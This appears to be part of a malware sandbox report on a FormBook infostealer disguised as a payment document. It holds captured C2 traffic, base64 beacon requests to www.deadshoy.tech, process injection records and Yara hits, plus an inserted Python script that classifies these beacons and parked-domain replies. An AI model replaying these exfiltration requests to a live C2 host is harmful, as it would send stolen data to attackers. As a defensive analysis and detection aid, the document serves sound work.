                                                       Dec 13, 2024 13:19:19.612441063 CET | 7416 | OUT | Data Raw: 67 61 54 53 35 6e 6f 61 66 69 4f 59 30 2b 4e 58 49 4c 33 64 66 61 50 50 34 54 4c 51 72 4e 51 49 6f 58 5a 49 47 49 6e 59 50 66 65 30 43 74 47 4f 59 74 72 6c 4d 36 53 39 4c 4a 55 2f 6b 53 39 62 77 48 77 33 62 36 46 42 4b 41 7a 61 78 68 7a 32 48 57
                                                      Data Ascii: gaTS5noafiOY0+NXIL3dfaPP4TLQrNQIoXZIGInYPfe0CtGOYtrlM6S9LJU/kS9bwHw3b6FBKAzaxhz2HWrerm/4SaK4MXgz9roz/i9NLri1BhhgxzZM8xQuJvxQKVrQy7EUHc1xC/pMDKP7QOQNuVSbX9ZV+x5MlGJ5L6wn74qAyzlFUCjV0gp6ry5umcIw6R3W9oQl0lsFWXf+50IM08zrMLTIpgP0akDdDvkiYH0Z2H2+7du
                                                       Dec 13, 2024 13:19:19.732019901 CET | 4944 | OUT | Data Raw: 4a 69 6f 34 4b 54 55 76 42 44 39 39 44 67 6d 38 69 33 4d 57 32 6e 73 4f 2f 62 4f 57 37 67 2b 63 6d 52 74 78 39 74 36 67 4a 2f 77 6c 6c 4d 71 44 59 64 6d 57 61 63 68 76 52 7a 69 43 76 49 61 45 33 68 70 52 73 4b 42 41 35 69 50 41 4c 2b 73 4e 74 4a
                                                      Data Ascii: Jio4KTUvBD99Dgm8i3MW2nsO/bOW7g+cmRtx9t6gJ/wllMqDYdmWachvRziCvIaE3hpRsKBA5iPAL+sNtJjEZSVufPn5pkzJho4n2vxz7Jy+voDcLKslgvwnAx0sx6iQ6wYkLhbYR4So3y+GIdGwZhARGB/PNZayu4KRg4NzZelS4/dHMLWyDoOmQCtKndUz+7TFR3vyt/Ih8vb4dywlof2taEiQc1g1Qa5fYkoyCSFmrYh2R9N
                                                       Dec 13, 2024 13:19:19.732157946 CET | 3677 | OUT | Data Raw: 4f 47 48 51 6e 51 61 38 51 51 6c 53 78 65 35 62 4b 67 71 62 62 6d 55 2b 79 2f 6f 30 75 51 50 30 30 48 4d 68 36 41 79 70 38 43 4a 6e 74 48 67 53 79 68 4a 54 65 30 77 6b 4a 31 61 4d 2b 45 71 42 73 48 39 73 45 38 5a 6c 38 4e 6d 63 37 78 50 49 45 49
                                                      Data Ascii: OGHQnQa8QQlSxe5bKgqbbmU+y/o0uQP00HMh6Ayp8CJntHgSyhJTe0wkJ1aM+EqBsH9sE8Zl8Nmc7xPIEItykzo5m0f22/dQQki6DK3Wy3uY5B8H+yvtMRzzFoIIxvl062F/LMkYXa/UB178zTqjZ8TJ17dB6rLecrmiLKIn/e4MQOSdQCfd3JcG4kaevQamfVkjutRbIsE7U1D9Mibgh0rkNRzTgQcW3bVTN6QQzb19xrlslMB
                                                       Dec 13, 2024 13:19:20.875353098 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:20 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1118
                                                      x-request-id: 8e384c94-ebd8-40f7-8c82-65668e45634a
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==
                                                      set-cookie: parking_session=8e384c94-ebd8-40f7-8c82-65668e45634a; expires=Fri, 13 Dec 2024 12:34:20 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 72 33 5a 6a 61 39 35 78 34 31 71 56 2f 31 71 34 36 62 30 74 79 75 74 50 55 71 4f 59 78 75 54 5a 74 33 76 4d 35 6b 37 44 45 65 70 36 62 73 34 54 79 33 56 32 6b 45 33 30 68 6d 32 48 4a 49 61 59 6c 39 62 64 77 48 51 6d 66 54 61 30 6e 44 49 62 73 32 73 4b 4f 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_r3Zja95x41qV/1q46b0tyutPUqOYxuTZt3vM5k7DEep6bs4Ty3V2kE30hm2HJIaYl9bdwHQmfTa0nDIbs2sKOw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                       Dec 13, 2024 13:19:20.875376940 CET | 571 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOGUzODRjOTQtZWJkOC00MGY3LThjODItNjU2NjhlNDU2MzRhIiwicGFnZV90aW1lIjoxNzM0MDkyMz


                                                       Session ID:16
                                                       Source IP:192.168.2.24
                                                       Source Port:49803
                                                       Destination IP:199.59.243.227
                                                       Destination Port:80
                                                       PID:6880
                                                       Process:C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
                                                       Timestamp | Bytes transferred | Direction | Data
                                                       Dec 13, 2024 13:19:22.728226900 CET | 441 | OUT | GET /0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf HTTP/1.1
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-US,en;q=0.9
                                                      Connection: close
                                                      Host: www.deadshoy.tech
                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) Gecko/20100101 Firefox/27.0
                                                       Dec 13, 2024 13:19:23.813772917 CET | 1236 | IN | HTTP/1.1 200 OK
                                                      date: Fri, 13 Dec 2024 12:19:22 GMT
                                                      content-type: text/html; charset=utf-8
                                                      content-length: 1450
                                                      x-request-id: 71cb848c-7646-4c1e-a967-430c26fe6609
                                                      cache-control: no-store, max-age=0
                                                      accept-ch: sec-ch-prefers-color-scheme
                                                      critical-ch: sec-ch-prefers-color-scheme
                                                      vary: sec-ch-prefers-color-scheme
                                                      x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fgoPHtm/QramMV3RGv+U5R9VJq2aSu1vJCQ1epOx9iMZ7ZzabfbSCsa0SkckQacB2sa4NC85pAb6vugaRMjWZg==
                                                      set-cookie: parking_session=71cb848c-7646-4c1e-a967-430c26fe6609; expires=Fri, 13 Dec 2024 12:34:23 GMT; path=/
                                                      connection: close
                                                      Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 66 67 6f 50 48 74 6d 2f 51 72 61 6d 4d 56 33 52 47 76 2b 55 35 52 39 56 4a 71 32 61 53 75 31 76 4a 43 51 31 65 70 4f 78 39 69 4d 5a 37 5a 7a 61 62 66 62 53 43 73 61 30 53 6b 63 6b 51 61 63 42 32 73 61 34 4e 43 38 35 70 41 62 36 76 75 67 61 52 4d 6a 57 5a 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                      Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_fgoPHtm/QramMV3RGv+U5R9VJq2aSu1vJCQ1epOx9iMZ7ZzabfbSCsa0SkckQacB2sa4NC85pAb6vugaRMjWZg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                                       Dec 13, 2024 13:19:23.813800097 CET | 903 | IN | Data Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                                                      Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiNzFjYjg0OGMtNzY0Ni00YzFlLWE5NjctNDMwYzI2ZmU2NjA5IiwicGFnZV90aW1lIjoxNzM0MDkyMz
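The four sessions above share one shape: a POST (or, in session 16, a GET) to www.deadshoy.tech with a single form parameter whose name ends in an underscore and whose value is base64 text, a 2014-era Mac Firefox/27.0 User-Agent sent from a Windows host, Connection: close, and Origin/Referer pointing back at the C2 host. Every reply, including the one to the 45184-byte POST in session 15, is a domain-parking page (parking_session cookie, x-adblock-key header, window.park script, content-length 1118 or 1450), so the C2 domain answered nothing of its own. The script below is an added example, not part of the Joe Sandbox report: it reconstructs the captured messages (header sets abridged, the x-adblock-key value cut short, the benign request made up for contrast) and classifies each session. The trait names and regexes are this example's own heuristics drawn from these four sessions, not a published FormBook signature.

```python
"""Classify FormBook-style beacons and parked-domain replies from the capture above.

Added example, not part of the Joe Sandbox report. The messages below are
constructed from the requests and responses shown in sessions 13 and 16
(header sets abridged, the long x-adblock-key value cut short); the benign
request is made up for contrast.
"""
import re
from urllib.parse import urlsplit

UA_FIREFOX27_MAC = ("Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:27.0) "
                    "Gecko/20100101 Firefox/27.0")

REQUEST_POST = (  # session 13; the form body is the one shown in the capture
    "POST /0sq9/ HTTP/1.1\r\n"
    "Content-Length: 204\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: close\r\n"
    "Host: www.deadshoy.tech\r\n"
    "Origin: http://www.deadshoy.tech\r\n"
    "Referer: http://www.deadshoy.tech/0sq9/\r\n"
    f"User-Agent: {UA_FIREFOX27_MAC}\r\n"
    "\r\n"
    "BTV4RR_=9BEMgTjmi+A69lQj1JD+uwY88dznZP7cfVqnbKsuYjgtViMivgq9j9B3adrHIOUO+0Y6WjKOYKzhL4Zu+u6R73mnF4LQLviRkG26OnwEjuikvJrI1qS4D9iw+eWplVlrXbqS+h4Yd+L1gsl1luEBUxie7iLuK8eBelPSbf4zSzGdoQxvzsnJeBa2/hcj+fMtJQ=="
)
REQUEST_GET = (  # session 16
    "GET /0sq9/?BTV4RR_=wDssjmzaov4c9lpE8JDB5V0DqfSXJcjPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdzFODF7KjQZum5G+6I0N94vKpqL+/svKTI9o=&Tr=F0udvf HTTP/1.1\r\n"
    "Connection: close\r\n"
    "Host: www.deadshoy.tech\r\n"
    f"User-Agent: {UA_FIREFOX27_MAC}\r\n"
    "\r\n"
)
REQUEST_BENIGN = "GET /index.html HTTP/1.1\r\nHost: example.com\r\nUser-Agent: curl/8.5.0\r\n\r\n"  # made up

RESPONSE_PARKED = (  # session 13 reply: a domain-parking page, not an operator response
    "HTTP/1.1 200 OK\r\n"
    "content-type: text/html; charset=utf-8\r\n"
    "content-length: 1118\r\n"
    "x-request-id: 9846122a-ba1b-4b9d-a212-ab4e3bd1f313\r\n"
    "x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_...\r\n"
    "set-cookie: parking_session=9846122a-ba1b-4b9d-a212-ab4e3bd1f313; expires=Fri, 13 Dec 2024 12:34:14 GMT; path=/\r\n"
    "connection: close\r\n"
    "\r\n"
    '<!doctype html>\n<html lang="en"><head></head><body><div id="target" style="opacity: 0"></div>\n'
    '<script>window.park = "eyJ1dWlkIjoi...";</script></body></html>'
)


def parse_http(raw):
    """Split a raw HTTP message into (start line, lower-cased header dict, body).
    Repeated header names (several Set-Cookie lines, say) would overwrite each
    other; the captured replies carry one of each."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def beacon_traits(raw_request):
    """Extract the traits shared by all four captured requests."""
    start, h, body = parse_http(raw_request)
    method, target, _ = start.split(" ", 2)
    url = urlsplit(target)
    params = body if method == "POST" else url.query
    key, _, rest = params.partition("=")
    value = rest.split("&", 1)[0]
    ua = h.get("user-agent", "")
    host = h.get("host", "")
    return {
        "method": method,
        "path": url.path,
        "host": host,
        # one short alphanumeric directory, e.g. /0sq9/
        "short_dir_path": re.fullmatch(r"/[A-Za-z0-9]{2,8}/", url.path) is not None,
        # a Mac Firefox 27 UA sent from a Windows host is an anomaly on its own
        "legacy_mac_firefox_ua": "Intel Mac OS X 10.10" in ua and "Firefox/27.0" in ua,
        "connection_close": h.get("connection", "").lower() == "close",
        # Origin is absent (GET) or points back at the C2 host itself
        "origin_is_self": h.get("origin", f"http://{host}") == f"http://{host}",
        "param_key": key,
        "key_trailing_underscore": key.endswith("_"),
        "value_base64ish": re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value) is not None,
        "content_length_ok": method != "POST"
        or h.get("content-length") == str(len(body.encode())),
    }


def is_formbook_like(t):
    return all(t[k] for k in ("short_dir_path", "legacy_mac_firefox_ua", "connection_close",
                              "origin_is_self", "key_trailing_underscore", "value_base64ish"))


def parked_reply_indicators(raw_response):
    start, h, body = parse_http(raw_response)
    return {
        "status": int(start.split(" ")[1]),
        "parking_cookie": h.get("set-cookie", "").startswith("parking_session="),
        "adblock_key_header": "x-adblock-key" in h,
        "park_script": "window.park" in body,
    }


def is_parked_domain(p):
    return p["status"] == 200 and p["parking_cookie"] and p["park_script"]


def summarize(raw_request, raw_response):
    """Verdict for one session: beacon pattern plus whether the C2 actually answered."""
    if not is_formbook_like(beacon_traits(raw_request)):
        return "no beacon pattern"
    if is_parked_domain(parked_reply_indicators(raw_response)):
        return "formbook-like beacon; C2 domain parked, no operator reply"
    return "formbook-like beacon; live reply, inspect body"


if __name__ == "__main__":
    for name, req in (("POST", REQUEST_POST), ("GET", REQUEST_GET), ("benign", REQUEST_BENIGN)):
        print(name, summarize(req, RESPONSE_PARKED))
```

The parked-domain check matters for triage: the sample is a working stealer (Yara hits, injection, the large POST), but in this run nothing reached an operator, so the traffic is an IOC for the C2 domain, not evidence of a successful exfiltration.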



                                                      Target ID:0
                                                      Start time:07:17:18
                                                      Start date:13/12/2024
                                                      Path:C:\Users\user\Desktop\Payment Copy #190922-001.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\Payment Copy #190922-001.exe"
                                                      Imagebase:0x10000
                                                      File size:1'201'664 bytes
                                                      MD5 hash:6AD492E20A37CB8AE67231FA9059DF17
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

Target ID: 4
Start time: 07:17:20
Start date: 13/12/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\Payment Copy #190922-001.exe"
Imagebase: 0x100000
File size: 48'096 bytes
MD5 hash: B96D1C078A724E31B6F98CDB999E47F6
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.11673757784.0000000002670000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.11674260737.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.11674681590.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 14
Start time: 07:17:49
Start date: 13/12/2024
Path: C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\SjWHhxMkjXKcvRvMYoGCQlIgpLreUhhzHngKAzOHobQvtrblPkXufal\gXhpelxbquSwSp.exe"
Imagebase: 0x3a0000
File size: 140'800 bytes
MD5 hash: 32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.12536862831.0000000002F50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.12537425982.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 15
Start time: 07:17:51
Start date: 13/12/2024
Path: C:\Windows\SysWOW64\xwizard.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\xwizard.exe"
Imagebase: 0xb20000
File size: 64'512 bytes
MD5 hash: CE6B6D39FDAB5FB8D87953BAEB662132
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.12535665138.0000000000700000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.12536524767.00000000044A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000F.00000002.12536605737.00000000044F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false

Target ID: 22
Start time: 07:18:16
Start date: 13/12/2024
Path: C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit): false
Commandline: "C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase: 0x7ff6e8040000
File size: 671'808 bytes
MD5 hash: 4E82C81BC54B7858AA507CA58D0E3FA2
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: low
Has exited: true

No disassembly